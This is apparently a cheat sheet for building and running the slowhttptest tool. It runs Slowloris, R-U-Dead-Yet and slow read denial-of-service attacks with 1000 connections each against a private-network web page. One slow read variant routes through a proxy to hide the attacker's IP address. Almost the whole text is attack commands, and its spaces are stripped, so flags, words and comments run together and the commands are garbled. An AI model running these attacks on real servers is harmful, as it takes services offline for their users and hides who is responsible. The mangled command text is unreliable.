tar-xzvfslowhttptest-x.x.tar.gz
cdslowhttptest-x.x
./configure--prefix=/opt/slowhttppost
make
sudomakeinstall
# Example: slow body mode (a.k.a. R-U-Dead-Yet); output is displayed only on screenslowhttptest-c1000-B-i110-r200-s8192-tFAKEVERB-uhttp://192.168.1.37/info.php-x10-p3# The same, but save the chart to a fileslowhttptest-c1000-B-g-omy_body_stats-i110-r200-s8192-tFAKEVERB-uhttp://192.168.1.37/info.php-x10-p3# Example: slow headers mode (a.k.a. Slowloris)slowhttptest-c1000-H-i10-r200-tGET-uhttp://192.168.1.37/info.php-x24-p3# slowhttptest-c1000-H-i10-r200-tGET-uhttp://192.168.1.37/info.php-x24-p3# The same, but save the chart to a fileslowhttptest-c1000-H-g-omy_header_stats-i10-r200-tGET-uhttp://192.168.1.37/info.php-x24-p3# Example: Slow Read mode through a proxy.# Here x.x.x.x:8080 is the proxy used to access the website from a different IP address:slowhttptest-c1000-X-r1000-w10-y20-n5-z32-uhttp://192.168.1.37/info.php-p5-l350-ex.x.x.x:8080